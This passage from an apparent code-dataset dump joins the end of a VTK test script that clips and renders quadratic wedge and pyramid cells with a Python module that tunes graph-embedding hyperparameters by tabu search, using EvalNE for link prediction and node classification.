QLwedgePoints.InsertPoint(10, 0.5, 0.5, 1)
QLwedgePoints.InsertPoint(11, 0, 0.5, 1)
QLwedgeScalars = vtk.vtkFloatArray()
QLwedgeScalars.SetNumberOfTuples(12)
QLwedgeScalars.InsertValue(0, 1.0)
QLwedgeScalars.InsertValue(1, 1.0)
QLwedgeScalars.InsertValue(2, 1.0)
QLwedgeScalars.InsertValue(3, 1.0)
QLwedgeScalars.InsertValue(4, 1.0)
QLwedgeScalars.InsertValue(5, 1.0)
QLwedgeScalars.InsertValue(6, 0.0)
QLwedgeScalars.InsertValue(7, 0.0)
QLwedgeScalars.InsertValue(8, 0.0)
QLwedgeScalars.InsertValue(9, 0.0)
QLwedgeScalars.InsertValue(10, 0.0)
QLwedgeScalars.InsertValue(11, 0.0)
QLWedge = vtk.vtkQuadraticLinearWedge()
QLWedge.GetPointIds().SetId(0, 0)
QLWedge.GetPointIds().SetId(1, 1)
QLWedge.GetPointIds().SetId(2, 2)
QLWedge.GetPointIds().SetId(3, 3)
QLWedge.GetPointIds().SetId(4, 4)
QLWedge.GetPointIds().SetId(5, 5)
QLWedge.GetPointIds().SetId(6, 6)
QLWedge.GetPointIds().SetId(7, 7)
QLWedge.GetPointIds().SetId(8, 8)
QLWedge.GetPointIds().SetId(9, 9)
QLWedge.GetPointIds().SetId(10, 10)
QLWedge.GetPointIds().SetId(11, 11)
# QLaWedge DebugOn
QLWedgeGrid = vtk.vtkUnstructuredGrid()
QLWedgeGrid.Allocate(1, 1)
QLWedgeGrid.InsertNextCell(QLWedge.GetCellType(), QLWedge.GetPointIds())
QLWedgeGrid.SetPoints(QLwedgePoints)
QLWedgeGrid.GetPointData().SetScalars(QLwedgeScalars)
QLwedgeclips = vtk.vtkClipDataSet()
QLwedgeclips.SetInputData(QLWedgeGrid)
QLwedgeclips.SetValue(0.5)
QLWedgeclipMapper = vtk.vtkDataSetMapper()
QLWedgeclipMapper.SetInputConnection(QLwedgeclips.GetOutputPort())
QLWedgeclipMapper.ScalarVisibilityOff()
QLWedgeMapper = vtk.vtkDataSetMapper()
QLWedgeMapper.SetInputData(QLWedgeGrid)
aWedgeMapper.ScalarVisibilityOff()
QLWedgeActor = vtk.vtkActor()
QLWedgeActor.SetMapper(QLWedgeMapper)
QLWedgeActor.GetProperty().SetRepresentationToWireframe()
QLWedgeActor.GetProperty().SetAmbient(1.0)
QLWedgeclipActor = vtk.vtkActor()
QLWedgeclipActor.SetMapper(QLWedgeclipMapper)
QLWedgeclipActor.GetProperty().SetAmbient(1.0)
# BiQuadratic wedge
BQwedgePoints = vtk.vtkPoints()
BQwedgePoints.SetNumberOfPoints(18)
BQwedgePoints.InsertPoint(0, 0, 0, 0)
BQwedgePoints.InsertPoint(1, 1, 0, 0)
BQwedgePoints.InsertPoint(2, 0, 1, 0)
BQwedgePoints.InsertPoint(3, 0, 0, 1)
BQwedgePoints.InsertPoint(4, 1, 0, 1)
BQwedgePoints.InsertPoint(5, 0, 1, 1)
BQwedgePoints.InsertPoint(6, 0.5, 0, 0)
BQwedgePoints.InsertPoint(7, 0.5, 0.5, 0)
BQwedgePoints.InsertPoint(8, 0, 0.5, 0)
BQwedgePoints.InsertPoint(9, 0.5, 0, 1)
BQwedgePoints.InsertPoint(10, 0.5, 0.5, 1)
BQwedgePoints.InsertPoint(11, 0, 0.5, 1)
BQwedgePoints.InsertPoint(12, 0, 0, 0.5)
BQwedgePoints.InsertPoint(13, 1, 0, 0.5)
BQwedgePoints.InsertPoint(14, 0, 1, 0.5)
BQwedgePoints.InsertPoint(15, 0.5, 0, 0.5)
BQwedgePoints.InsertPoint(16, 0.5, 0.5, 0.5)
BQwedgePoints.InsertPoint(17, 0, 0.5, 0.5)
BQwedgeScalars = vtk.vtkFloatArray()
BQwedgeScalars.SetNumberOfTuples(18)
BQwedgeScalars.InsertValue(0, 1.0)
BQwedgeScalars.InsertValue(1, 1.0)
BQwedgeScalars.InsertValue(2, 1.0)
BQwedgeScalars.InsertValue(3, 1.0)
BQwedgeScalars.InsertValue(4, 1.0)
BQwedgeScalars.InsertValue(5, 1.0)
BQwedgeScalars.InsertValue(6, 0.0)
BQwedgeScalars.InsertValue(7, 0.0)
BQwedgeScalars.InsertValue(8, 0.0)
BQwedgeScalars.InsertValue(9, 0.0)
BQwedgeScalars.InsertValue(10, 0.0)
BQwedgeScalars.InsertValue(11, 0.0)
BQwedgeScalars.InsertValue(12, 0.0)
BQwedgeScalars.InsertValue(13, 0.0)
BQwedgeScalars.InsertValue(14, 0.0)
BQwedgeScalars.InsertValue(15, 0.0)
BQwedgeScalars.InsertValue(16, 0.0)
BQwedgeScalars.InsertValue(17, 0.0)
BQWedge = vtk.vtkBiQuadraticQuadraticWedge()
BQWedge.GetPointIds().SetId(0, 0)
BQWedge.GetPointIds().SetId(1, 1)
BQWedge.GetPointIds().SetId(2, 2)
BQWedge.GetPointIds().SetId(3, 3)
BQWedge.GetPointIds().SetId(4, 4)
BQWedge.GetPointIds().SetId(5, 5)
BQWedge.GetPointIds().SetId(6, 6)
BQWedge.GetPointIds().SetId(7, 7)
BQWedge.GetPointIds().SetId(8, 8)
BQWedge.GetPointIds().SetId(9, 9)
BQWedge.GetPointIds().SetId(10, 10)
BQWedge.GetPointIds().SetId(11, 11)
BQWedge.GetPointIds().SetId(12, 12)
BQWedge.GetPointIds().SetId(13, 13)
BQWedge.GetPointIds().SetId(14, 14)
BQWedge.GetPointIds().SetId(15, 15)
BQWedge.GetPointIds().SetId(16, 16)
BQWedge.GetPointIds().SetId(17, 17)
# BQWedge DebugOn
BQWedgeGrid = vtk.vtkUnstructuredGrid()
BQWedgeGrid.Allocate(1, 1)
BQWedgeGrid.InsertNextCell(BQWedge.GetCellType(), BQWedge.GetPointIds())
BQWedgeGrid.SetPoints(BQwedgePoints)
BQWedgeGrid.GetPointData().SetScalars(BQwedgeScalars)
BQwedgeclips = vtk.vtkClipDataSet()
BQwedgeclips.SetInputData(BQWedgeGrid)
BQwedgeclips.SetValue(0.5)
BQWedgeclipMapper = vtk.vtkDataSetMapper()
BQWedgeclipMapper.SetInputConnection(BQwedgeclips.GetOutputPort())
BQWedgeclipMapper.ScalarVisibilityOff()
BQWedgeMapper = vtk.vtkDataSetMapper()
BQWedgeMapper.SetInputData(BQWedgeGrid)
BQWedgeMapper.ScalarVisibilityOff()
BQWedgeActor = vtk.vtkActor()
BQWedgeActor.SetMapper(BQWedgeMapper)
BQWedgeActor.GetProperty().SetRepresentationToWireframe()
BQWedgeActor.GetProperty().SetAmbient(1.0)
BQWedgeclipActor = vtk.vtkActor()
BQWedgeclipActor.SetMapper(BQWedgeclipMapper)
BQWedgeclipActor.GetProperty().SetAmbient(1.0)
# Quadratic pyramid
pyraPoints = vtk.vtkPoints()
pyraPoints.SetNumberOfPoints(13)
pyraPoints.InsertPoint(0, 0, 0, 0)
pyraPoints.InsertPoint(1, 1, 0, 0)
pyraPoints.InsertPoint(2, 1, 1, 0)
pyraPoints.InsertPoint(3, 0, 1, 0)
pyraPoints.InsertPoint(4, 0, 0, 1)
pyraPoints.InsertPoint(5, 0.5, 0, 0)
pyraPoints.InsertPoint(6, 1, 0.5, 0)
pyraPoints.InsertPoint(7, 0.5, 1, 0)
pyraPoints.InsertPoint(8, 0, 0.5, 0)
pyraPoints.InsertPoint(9, 0, 0, 0.5)
pyraPoints.InsertPoint(10, 0.5, 0, 0.5)
pyraPoints.InsertPoint(11, 0.5, 0.5, 0.5)
pyraPoints.InsertPoint(12, 0, 0.5, 0.5)
pyraScalars = vtk.vtkFloatArray()
pyraScalars.SetNumberOfTuples(13)
pyraScalars.InsertValue(0, 1.0)
pyraScalars.InsertValue(1, 1.0)
pyraScalars.InsertValue(2, 1.0)
pyraScalars.InsertValue(3, 1.0)
pyraScalars.InsertValue(4, 1.0)
pyraScalars.InsertValue(5, 0.0)
pyraScalars.InsertValue(6, 0.0)
pyraScalars.InsertValue(7, 0.0)
pyraScalars.InsertValue(8, 0.0)
pyraScalars.InsertValue(9, 0.0)
pyraScalars.InsertValue(10, 0.0)
pyraScalars.InsertValue(11, 0.0)
pyraScalars.InsertValue(12, 0.0)
aPyramid = vtk.vtkQuadraticPyramid()
aPyramid.GetPointIds().SetId(0, 0)
aPyramid.GetPointIds().SetId(1, 1)
aPyramid.GetPointIds().SetId(2, 2)
aPyramid.GetPointIds().SetId(3, 3)
aPyramid.GetPointIds().SetId(4, 4)
aPyramid.GetPointIds().SetId(5, 5)
aPyramid.GetPointIds().SetId(6, 6)
aPyramid.GetPointIds().SetId(7, 7)
aPyramid.GetPointIds().SetId(8, 8)
aPyramid.GetPointIds().SetId(9, 9)
aPyramid.GetPointIds().SetId(10, 10)
aPyramid.GetPointIds().SetId(11, 11)
aPyramid.GetPointIds().SetId(12, 12)
aPyramidGrid = vtk.vtkUnstructuredGrid()
aPyramidGrid.Allocate(1, 1)
aPyramidGrid.InsertNextCell(aPyramid.GetCellType(), aPyramid.GetPointIds())
aPyramidGrid.SetPoints(pyraPoints)
aPyramidGrid.GetPointData().SetScalars(pyraScalars)
pyraclips = vtk.vtkClipDataSet()
pyraclips.SetInputData(aPyramidGrid)
pyraclips.SetValue(0.5)
aPyramidclipMapper = vtk.vtkDataSetMapper()
aPyramidclipMapper.SetInputConnection(pyraclips.GetOutputPort())
aPyramidclipMapper.ScalarVisibilityOff()
aPyramidMapper = vtk.vtkDataSetMapper()
aPyramidMapper.SetInputData(aPyramidGrid)
aPyramidMapper.ScalarVisibilityOff()
aPyramidActor = vtk.vtkActor()
aPyramidActor.SetMapper(aPyramidMapper)
aPyramidActor.GetProperty().SetRepresentationToWireframe()
aPyramidActor.GetProperty().SetAmbient(1.0)
aPyramidclipActor = vtk.vtkActor()
aPyramidclipActor.SetMapper(aPyramidclipMapper)
aPyramidclipActor.GetProperty().SetAmbient(1.0)
# Create the rendering related stuff.
# Since some of our actors are a single vertex, we need to remove all
# cullers so the single vertex actors will render
ren1 = vtk.vtkRenderer()
ren1.GetCullers().RemoveAllItems()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren1)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
ren1.SetBackground(.1, .2, .3)
renWin.SetSize(400, 200)
# specify properties
ren1.AddActor(aEdgeActor)
ren1.AddActor(aEdgeclipActor)
ren1.AddActor(aTriActor)
ren1.AddActor(aTriclipActor)
ren1.AddActor(aQuadActor)
ren1.AddActor(aQuadclipActor)
ren1.AddActor(BQuadActor)
ren1.AddActor(BQuadclipActor)
ren1.AddActor(QLQuadActor)
ren1.AddActor(QLQuadclipActor)
ren1.AddActor(aTetActor)
ren1.AddActor(aTetclipActor)
ren1.AddActor(aHexActor)
ren1.AddActor(aHexclipActor)
ren1.AddActor(TQHexActor)
ren1.AddActor(TQHexclipActor)
ren1.AddActor(BQHexActor)
ren1.AddActor(BQHexclipActor)
ren1.AddActor(aWedgeActor)
ren1.AddActor(aWedgeclipActor)
ren1.AddActor(BQWedgeActor)
ren1.AddActor(BQWedgeclipActor)
ren1.AddActor(QLWedgeActor)
ren1.AddActor(QLWedgeclipActor)
ren1.AddActor(aPyramidActor)
ren1.AddActor(aPyramidclipActor)
# places everyone!!
aEdgeclipActor.AddPosition(0, 2, 0)
aTriActor.AddPosition(2, 0, 0)
aTriclipActor.AddPosition(2, 2, 0)
aQuadActor.AddPosition(4, 0, 0)
BQuadActor.AddPosition(4, 0, 2)
QLQuadActor.AddPosition(4, 0, 4)
aQuadclipActor.AddPosition(4, 2, 0)
BQuadclipActor.AddPosition(4, 2, 2)
QLQuadclipActor.AddPosition(4, 2, 4)
aTetActor.AddPosition(6, 0, 0)
aTetclipActor.AddPosition(6, 2, 0)
aHexActor.AddPosition(8, 0, 0)
TQHexActor.AddPosition(8, 0, 2)
BQHexActor.AddPosition(8, 0, 4)
aHexclipActor.AddPosition(8, 2, 0)
TQHexclipActor.AddPosition(8, 2, 2)
BQHexclipActor.AddPosition(8, 2, 4)
aWedgeActor.AddPosition(10, 0, 0)
QLWedgeActor.AddPosition(10, 0, 2)
BQWedgeActor.AddPosition(10, 0, 4)
aWedgeclipActor.AddPosition(10, 2, 0)
QLWedgeclipActor.AddPosition(10, 2, 2)
BQWedgeclipActor.AddPosition(10, 2, 4)
aPyramidActor.AddPosition(12, 0, 0)
aPyramidclipActor.AddPosition(12, 2, 0)
[base, back, left] = backdrop.BuildBackdrop(-1, 15, -1, 4, -1, 6, .1)
ren1.AddActor(base)
base.GetProperty().SetDiffuseColor(.2, .2, .2)
ren1.AddActor(left)
left.GetProperty().SetDiffuseColor(.2, .2, .2)
ren1.AddActor(back)
back.GetProperty().SetDiffuseColor(.2, .2, .2)
ren1.ResetCamera()
ren1.GetActiveCamera().Dolly(2.5)
ren1.ResetCameraClippingRange()
renWin.Render()
# render the image
#
iren.Initialize()
#iren.Start()
| 34.555888 | 75 | 0.784087 |
4a27e20dab5555f7c75a799cc1fb9c0fada4d32a | 24,018 | py | Python | tuning.py | droully/Graph-Embedding | 820ee2bcb57c7883dc41bec6da0e12222a537331 | [
"BSD-3-Clause"
] | null | null | null | tuning.py | droully/Graph-Embedding | 820ee2bcb57c7883dc41bec6da0e12222a537331 | [
"BSD-3-Clause"
] | null | null | null | tuning.py | droully/Graph-Embedding | 820ee2bcb57c7883dc41bec6da0e12222a537331 | [
"BSD-3-Clause"
] | null | null | null | #%%
"""imports"""
import itertools
import os
import pickle
import random
import time
import matplotlib.pyplot as plt
import networkx as nx
import numpy as np
import pandas as pd
from openne.models import gae, gf, grarep, lap, line, lle, node2vec, sdne, vgae
from tqdm import tqdm
from evalne.evaluation.evaluator import LPEvaluator, NCEvaluator
from evalne.evaluation.score import Scoresheet
from evalne.evaluation.split import EvalSplit
from evalne.utils import preprocess as pp
from openne.dataloaders import Graph, create_self_defined_dataset
# %%
"""
users = pickle.load(open("data/users.p", "rb"))
visits = pickle.load(open("data/visits.p", "rb"))
props = pickle.load(open("data/props.p", "rb"))
grafos = pickle.load(open("data/grafos.p", "rb"))
grafos_test = pickle.load(open("data/grafos_test.p", "rb"))
nodesnuevos=[n for n in grafos_test.B_f if n not in grafos.B_f]
grafos_test.B_f.remove_nodes_from(nodesnuevos)
edgesnuevos=[e for e in grafos_test.B_f.edges if e not in grafos.B_f.edges]
grafos_test.B_f.remove_edges_from(list(grafos_test.B.edges))
grafos_test.B_f.add_edges_from(edgesnuevos)
grafos.set_features("users",mode="adj")
grafos.set_features("props",mode="adj")
grafos.set_features("bipartite",mode="adj")
"""
# %%
class Tuning:
r"""
Clase general de entrenamiento
"""
def __init__(self,G,root):
self.tipo = G.graph["tipo"]
self.root = root
self.methods_modules_dict = {
"line": line.LINE, "node2vec": node2vec.Node2vec,"gf":gf.GraphFactorization,"lap":lap.LaplacianEigenmaps,
"sdne": sdne.SDNE,"lle":lle.LLE,"grarep":grarep.GraRep,"gae":gae.GAE,"vgae":vgae.VGAE}
self.method_dims_dict = {"line": "dim","gf": "dim", "node2vec": "dim", "lap":"dim","sdne":"encoder_layer_list","lle":"dim",
"grarep":'dim',"gae":"output_dim","vgae":"output_dim"}
self.methods_params_names_dict = {"line": ["dim", "negative_ratio","lr"],
"node2vec": ["dim", "path_length", "num_paths", "p", "q"],
"gf":["dim"],
"lap":["dim"],
"sdne":["encoder_layer_list","alpha", "beta", "nu1","nu2"],
"lle":["dim"],
'grarep':["dim","kstep"],
'gae':["output_dim","hiddens","max_degree"],
'vgae':["output_dim","hiddens","max_degree"]
}
self.methods_params_types_dict = {"line": {"dim": "nat", "negative_ratio": "nat","lr":"ratio"},
"node2vec": {"dim": "nat", "path_length": "nat", "num_paths": "nat", "p": "ratio", "q": "ratio"},
"gf":{"dim":"nat"},
"lap":{"dim":"nat"},
"sdne":{"encoder_layer_list":"ratio","alpha":"ratio", "beta":"gtone", "nu1":"ratio","nu2": "ratio"},
"lle":{"dim":"nat"},
"grarep":{"dim":"nat","kstep":"nat"},
'gae':{"output_dim":"nat","hiddens":"ratio","max_degree":"nat"},
'vgae':{"output_dim":"nat","hiddens":"ratio","max_degree":"nat"}
}
self.training_graph =None
self.test_graph= None
self.labels = np.array([[node,attrs["label"][0]] for node, attrs in G.nodes(data=True)])
self.task=None
self.scoresheet=Scoresheet()
self.evaluator=None
self.method=None
def score(self, method_name,edge_method="hadamard"):
r"""
metodo que entrega la metrica guardada en el scoresheet; para NC f1 ponderado, para LP auroc
Parameters
----------
method_name: str
nombre del metodo
edge_method: str
metodo de embedding de enlace: "l1","l2","hadamard","average"
"""
if self.task=="nc":
return np.mean(self.scoresheet._scoresheet["GPI"][method_name+"_0.8"]["f1_weighted"])
if self.task=="lp":
dic_edge_method={"l1":0,"l2":1,"hadamard":2,"average":3}
# ['weighted_l1', 'weighted_l2', 'hadamard', 'average']
return np.mean(self.scoresheet._scoresheet["GPI"][method_name]["auroc"][dic_edge_method[edge_method]])
def time(self, method_name):
r"""
metodo que entrega el tiempo guardado en el scoresheet
Parameters
----------
method_name: str
nombre del metodo
"""
if self.task=="nc":
return self.scoresheet._scoresheet["GPI"][method_name+"_0.8"]['eval_time'][0]
if self.task=="lp":
# ['weighted_l1', 'weighted_l2', 'hadamard', 'average']
return self.scoresheet._scoresheet["GPI"][method_name]["eval_time"][0]
def HCgen(self, seed, scale):
r"""
generador de vecinos para hill climbing
Parameters
----------
seed: dict
diccionario semilla, donde las llaves son los parametros y los valores sus valores
scale: dict
diccionario escala, donde las llaves son los parametros y los valores que tanto
multiplicar o dividir
"""
aux = seed.copy()
yield aux
for k, v in seed.items():
if k not in scale:
continue
if self.methods_params_types_dict[self.method][k] == "nat":
aux.update({k: v+scale[k]})
yield aux
aux = seed.copy()
if v-scale[k] > 0:
aux.update({k: v-scale[k]})
yield aux
aux = seed.copy()
if self.methods_params_types_dict[self.method][k] == "ratio":
aux.update({k: v*scale[k]})
yield aux
aux = seed.copy()
aux.update({k: v/scale[k]})
yield aux
aux = seed.copy()
if self.methods_params_types_dict[self.method][k] == "gtone":
aux.update({k: v+scale[k]})
yield aux
aux = seed.copy()
if v-scale[k] > 1:
aux.update({k: v-scale[k]})
yield aux
aux = seed.copy()
def TestModel(self,*args):
return 0
def TrainModel(self, method, d, savefile=None, **kwargs):
r"""
Entrena un modelo de embeddings usando un metodo dado por OpenNE
OJO IMPORTANTE:
algunos modelos sus hiperparametros se les da en la definicion de la instancia:
model=loquesea(parametro)
y otros cuando se calculan los embeddings: vectors = model(parametro)
cual caso es depende del metodo y del parametro!!! (culpa de openNE)
Parameters
----------
method: str
Metodo de embedding a usar, puede ser "line","node2vec","gf","lap","sdne",'grarep','gae','vgae'.
d: int
Dimension del embedding.
savefile: str
Direccion de guardado del embedding, si es None no se guarda.
**kwargs: dict
Parametros para el metodo.
Returns
-------
emb: dict
Diccionario donde las llaves son los nodos y los valores su embedding.
time: float
Tiempo de entrenamiento.
"""
start = time.time()
if method=="node2vec" and not nx.is_directed(self.training_graph.G) :
dictostr = {node: str(node) for node in self.training_graph.G}
self.training_graph.G = nx.relabel_nodes(self.training_graph.G, dictostr)
self.training_graph.G = self.training_graph.G.to_directed()
model = self.methods_modules_dict[method](dim=d,save=False, **kwargs)
vectors = model(self.training_graph,**kwargs)
dictoint = {node: int(node) for node in self.training_graph.G}
self.training_graph.G = nx.relabel_nodes(self.training_graph.G, dictoint)
self.training_graph.G = self.training_graph.G.to_undirected()
elif method=="grarep":
model = self.methods_modules_dict[method](kstep=kwargs["kstep"],dim=d,save=False)
vectors = model(self.training_graph,dim=d,**kwargs)
elif method=="gae" or method=="vgae" :
kwargs["hiddens"]=[int(kwargs["hiddens"])]
model = self.methods_modules_dict[method](output_dim=d,dim=d,save=False,**kwargs)
vectors = model(self.training_graph,epochs=kwargs["epochs"])
elif method=="sdne":
kwargs["encoder_layer_list"]=[int(kwargs["encoder_layer_list"]),d]
model = self.methods_modules_dict[method](**kwargs,save=False)
vectors = model(self.training_graph,**kwargs)
else:
model = self.methods_modules_dict[method](dim=d,save=False, **kwargs)
vectors = model(self.training_graph,**kwargs)
end = time.time()
emb = {str(k): np.array(v) for k, v in vectors.items()}
if savefile is not None:
model.save_embeddings(savefile)
return emb, end-start
def TabuSearchParams(self, method, dim, seed={}, scale={}, iters=2, tabu_lenght=2, **kwargs):
r"""
Busca los mejores hiperparametros de un modelo aplicando lista tabu
----------
method: str
Metodo de embedding a usar, puede ser "line","node2vec","gf","lap","sdne",'grarep','gae','vgae'.
dim: int
Dimension del embedding.
seed: dict
Diccionario con los hiperparametros con los que se inicia la busqueda, las llaves son el nombre y los valores su valor
scale: dict
Diccionario con la escala de cada hiperparametro con la que se determinara el
iters: int
Numero de iteraciones de la lista tabu
tabu_lenght: int
Largo de la lista tabu
**kwargs: dict
Parametros extra para el modelo que no se tunearan
"""
self.method = method
self.path = "{}{}/{}/".format(self.root, self.tipo, self.method)
os.makedirs(self.path, exist_ok=True)
scorehist = pd.DataFrame(columns=self.methods_params_names_dict[self.method]+['f1'])
if self.method in ["gf", "lap", "lle"]:
iters=1
if self.method=="node2vec":
dictostr = {node: str(node) for node in self.training_graph.G}
self.training_graph.G = nx.relabel_nodes(self.training_graph.G, dictostr)
self.training_graph.G = self.training_graph.G.to_directed()
try:
self.scoresheet = pickle.load(open(self.path+"scorenc", "rb"))
except:
self.scoresheet = Scoresheet()
tabu_list = tabu_lenght*[" "]
best = seed
best_score=0
bestCandidate = seed
bestCandidateValues = tuple(bestCandidate.values())
#tabu_list.append(bestCandidateValues)
#tabu_list = tabu_list[1:]
score_dict = {(-1,): 0}
for _ in range(iters):
bestCandidate_ = bestCandidate
bestCandidate = {"dummy": -1}
bestCandidateValues=tuple(bestCandidate.values())
bestCandidateScore=score_dict[bestCandidateValues]
for candidate in self.HCgen(bestCandidate_, scale):
candidateValues = tuple(candidate.values())
params_str = " {:n}"*(len(candidateValues)+1)
params_str = params_str.format(dim, *candidateValues)
params_str=params_str[1:]
method_name ="{} {}".format(self.method,params_str)
try:
score_dict.update({candidateValues: self.score(method_name)})
except:
args = candidate.copy()
args.update(kwargs)
emb,time=self.TrainModel(self.method, dim, self.path+params_str+".txt", **args)
res = self.TestModel(emb,time, method_name)
#self.scoresheet.log_results(res)
self.scoresheet.write_pickle(self.path+"scorenc")
try:
os.remove(self.path+"scorenc.txt")
except:
pass
self.scoresheet.write_all(self.path+"scorenc.txt",repeats="all")
score_dict.update({candidateValues: self.score(method_name)})
if (candidateValues not in tabu_list) and (score_dict[candidateValues] >= bestCandidateScore):
bestCandidate = candidate.copy()
bestCandidateValues=tuple(bestCandidate.values())
bestCandidateScore=score_dict[tuple(bestCandidate.values())]
scorehist = scorehist.append({**{self.method_dims_dict[self.method]:dim}, **bestCandidate, **{"f1": bestCandidateScore}}, ignore_index=True)
if score_dict[bestCandidateValues] > best_score:
best = bestCandidate
best_score = score_dict[tuple(best.values())]
tabu_list.append(bestCandidateValues)
tabu_list = tabu_list[1:]
types2format = {"nat": '%d',"gtone": '%d', "ratio": '%E'}
fmt = [types2format[self.methods_params_types_dict[self.method][v]]
for v in self.methods_params_names_dict[self.method]]+['%1.6f']
np.savetxt(self.path+str(dim)+" scorehist.txt",scorehist.values, fmt=fmt)
if self.method=="node2vec":
dictoint = {node: int(node) for node in self.training_graph.G}
self.training_graph.G = nx.relabel_nodes(self.training_graph.G, dictoint)
self.training_graph.G = self.training_graph.G.to_undirected()
bestvalues=tuple(best.values())
params_str = " {:n}"*(len(bestvalues)+1)
params_str = params_str.format(dim, *bestvalues)
params_str=params_str[1:]
best_method_name="{} {}".format(self.method,params_str)
best_time= self.time(best_method_name)
if self.task=="nc":
return best, best_score, best_time
if self.task=="lp":
best_l1=self.score(best_method_name,edge_method="l1")
best_l2=self.score(best_method_name,edge_method="l2")
best_hadamard=self.score(best_method_name,edge_method="hadamard")
best_average=self.score(best_method_name,edge_method="average")
return best, best_l1, best_l2, best_hadamard, best_average, best_time
class LinkPredictionTuning(Tuning):
r"""
Clase general de entrenamiento y testeo de embeddings de grafos para la tarea de prediccion de enlaces.
Parameters
----------
G: NetworkX graph
Grafo de entrenamiento.
G_test: NetworkX graph
Grafo de testeo.
root: str
directorio en el que se guardaran los resultados
"""
def __init__(self, G,G_test, root="results/lp/"):
super(LinkPredictionTuning, self).__init__(G, root=root)
self.task="lp"
train_E=G.edges
train_E_false=self.GetNegativeEdges(G,len(train_E))
test_E=G_test.edges
test_E_false=self.GetNegativeEdges(G_test,len(test_E))
self.split = EvalSplit()
self.split.set_splits(train_E, train_E_false=train_E_false, test_E=test_E, test_E_false=test_E_false, TG=G)
self.training_graph = create_self_defined_dataset(root_dir="",name_dict={},name="training "+self.tipo, weighted=True, directed=False, attributed=True)()
self.training_graph.set_g(G)
self.evaluator = LPEvaluator(self.split)
def GetNegativeEdges(self, G, n):
r"""
Metodo auxiliar que muestrea enlaces negativos.
Parameters
----------
G: NetworkX graph
Grafo bipartito.
n: int
cantidad de enlaces que muestrear.
"""
prop_nodes=[n for n, d in G.nodes(data=True) if d['bipartite']==0]
user_nodes=[n for n, d in G.nodes(data=True) if d['bipartite']==1]
non_edges=[]
while len(non_edges) <=n:
random_prop = random.choice(prop_nodes)
random_user = random.choice(user_nodes)
edge=(random_prop,random_user)
if G.has_edge(*edge):
continue
else:
non_edges.append(edge)
return non_edges
def TestModel(self, emb,time=-1, method_name="method_name"):
r"""
Testea un embedding y lo guarda en el scoresheet.
Parameters
----------
emb: dict
diccionario de embeddings, llaves son los nodos y los valores una lista con el embedding
time: float
tiempo de ejecucion del metodo, para guardar en el scoresheet
method_name: str
nombre del metodo con el que guardar.
"""
df = pd.DataFrame(emb).T
X = df.T.to_dict("list")
X = {str(k): np.array(v) for k, v in X.items()} # tiene que ser array por que se hacen sumas
self.evaluator.dim=df.shape[1]
reslp=[]
for edge_method in ["weighted_l1","weighted_l2","hadamard","average"]:
#TO DO que no evalue en los 4 embeddings de enlaces
res = self.evaluator.evaluate_ne(self.split, X=X,method=method_name,edge_embed_method=edge_method,params={"nw_name":"GPI"})
res.params.update({'eval_time': time})
reslp.append(res)
self.scoresheet.log_results(reslp)
return reslp
class NodeClassificationTuning(Tuning):
r"""
Clase general de entrenamiento y testeo de embeddings de grafos para la tarea de clasificacion de nodos.
Parameters
----------
G: NetworkX graph
Grafo.
root: str
directorio en el que se guardaran los resultados
"""
def __init__(self, G, root="results/nc/",**kwargs):
super(NodeClassificationTuning, self).__init__(G, root=root)
self.task="nc"
self.training_graph=create_self_defined_dataset(root_dir="",name_dict={},name="test "+self.tipo, weighted=True, directed=False, attributed=True)()
self.training_graph.set_g(G)
self.evaluator = NCEvaluator(self.training_graph.G, self.labels, nw_name="GPI",
num_shuffles=5, traintest_fracs=[0.8], trainvalid_frac=0)
def TestModel(self, emb,time=-1, method_name="method_name"):
r"""
Testea un embedding y lo guarda en el scoresheet.
Parameters
----------
emb: dict
diccionario de embeddings, llaves son los nodos y los valores una lista con el embedding
time: float
tiempo de ejecucion del metodo, para guardar en el scoresheet
method_name: str
nombre del metodo con el que guardar.
"""
df = pd.DataFrame(emb).T
X = df.T.to_dict("list")
X = {str(k): np.array(v) for k, v in X.items()}# tiene que ser array por que se hacen sumas
self.evaluator.dim=df.shape[1]
resnc = self.evaluator.evaluate_ne(X=X, method_name=method_name)
for res in resnc:
res.params.update({'eval_time': time})
self.scoresheet.log_results(resnc)
return resnc
# %%
def tabu_search(G,task, method,G_test=None,seed={}, scale={}, dims=[10, 30, 50, 100, 300, 500],**kwargs):
r"""
funcion auxiliar que repite la busqueda tabu para un grafo, tarea, metodo, semilla/escala, y dimensiones
especificas
Parameters
----------
G: NetworkX graph
Grafo.
task: str
tarea: "nc" o "lp"
G_test: NetworkX graph
Grafo de testeo (solo para lp)
seed: dict
diccionario de parametros semilla
scale: dict
diccionario de parametros escala
dims: list
lista de dimensiones con las probar
**kwargs
parametros de los metodos que no se quieren tunera
"""
if task =="nc":
tester=NodeClassificationTuning(G)
df=pd.DataFrame(columns=["name","score","time"])
if task =="lp":
tester=LinkPredictionTuning(G,G_test)
df=pd.DataFrame(columns=["name","l1","l2","hadamard","average","time"])
best_dict={}
for d in dims:
if task =="nc":
best, best_f1, best_time=tester.TabuSearchParams(method=method,dim=d,seed=seed,scale=scale,**kwargs)
best_dict.update({"name":best,"score":best_f1,"time":best_time})
if task =="lp":
best, best_l1, best_l2, best_hadamard, best_average, best_time=tester.TabuSearchParams(method=method,dim=d,seed=seed,scale=scale,**kwargs)
best_dict.update({"name":best,"l1":best_l1,"l2":best_l2,"hadamard":best_hadamard,"average":best_average,"time":best_time})
df=df.append(best_dict,ignore_index=True)
df.index=dims
df.to_csv("results/"+task+"/"+G.graph["tipo"]+"/"+method+"/dimf1.csv")
return df
#%%
"""
for grafo,task in [(grafos.Users_f,"nc")]:
tabu_search(grafo,task,"gae",seed={"hiddens":128,"max_degree":0},scale={"hiddens":2,"max_degree":1},iters=2,epochs=200)
tabu_search(grafo,task,"vgae",seed={"hiddens":128,"max_degree":0},scale={"hiddens":2,"max_degree":1},iters=2,epochs=200)
#tabu_search(grafo,task,"grarep",seed={"kstep": 5}, iters=1)
#tabu_search(grafo,task,"gf")
#tabu_search(grafo,task,"lap")
#tabu_search(grafo,task,"node2vec",seed={"path_length": 20, "num_paths": 10, "p": 0.1, "q": 0.1},scale={"path_length": 5, "num_paths": 5, "p": 10, "q": 10},iters=2, window=4)
#tabu_search(grafo,task,"line",seed={"negative_ratio": 15,"lr":0.001 }, iters=1,epochs=10)
